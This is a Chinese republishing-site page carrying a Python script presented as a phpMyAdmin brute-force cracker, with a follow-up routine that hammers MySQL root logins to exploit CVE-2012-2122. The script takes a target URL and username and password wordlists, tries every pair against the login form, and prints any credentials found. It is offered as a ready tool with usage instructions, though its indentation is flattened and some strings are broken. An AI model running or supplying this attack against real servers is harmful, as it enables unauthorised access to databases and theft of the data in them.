最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
当前位置: 首页 - 科技 - 知识百科 - 正文

Python写的PHPMyAdmin暴力破解工具代码

来源:动视网 责编:小采 时间:2020-11-27 14:30:48
文档

Python写的PHPMyAdmin暴力破解工具代码

Python写的PHPMyAdmin暴力破解工具代码:PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。 #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subproce
推荐度:
导读Python写的PHPMyAdmin暴力破解工具代码:PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。 #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subproce


PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。

#!/usr/bin/env python
import urllib 
import urllib2 
import cookielib 
import sys
import subprocess
def Crack(url,username,password):
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) 
	headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW)'}
	params = urllib.urlencode({'pma_username': username, 'pma_password': password})
	request = urllib2.Request(url+"/index.php", params,headers)
	response = opener.open(request) 
	a=response.read() 
	if a.find('Database server')!=-1 and a.find('name="login_form"')==-1:
	return username,password
	return 0
def MySQLAuthenticationBypassCheck(host,port):
	i=0
	while i<300:
	i=i+1
	subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait()
if __name__ == '__main__':
	if len(sys.argv)<4:
	print "#author:iswin
#useage python pma.py http://www.gxlcms.com/phpmyadmin/ username.txt password.txt"
	sys.exit()
	print "Bruting,Pleas wait..."
	for name in open(sys.argv[2],"r"):
	for passw in open(sys.argv[3],"r"):
	state=Crack(sys.argv[1],name,passw)
	if state!=0:
	print "
Brute successful"
	print "UserName: "+state[0]+"PassWord: "+state[1]
	sys.exit()
	print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck"
	choice=raw_input('Warning:This function needs mysql environment.
Y:Try to MySQLAuthenticationBypassCheck
Others:Exit
')
	if choice=='Y' or choice=='y':
	host=raw_input('Host:')
	port=raw_input('Port:')
	MySQLAuthenticationBypassCheck(host,port)

文档

Python写的PHPMyAdmin暴力破解工具代码

Python写的PHPMyAdmin暴力破解工具代码:PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。 #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subproce
推荐度:
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
Top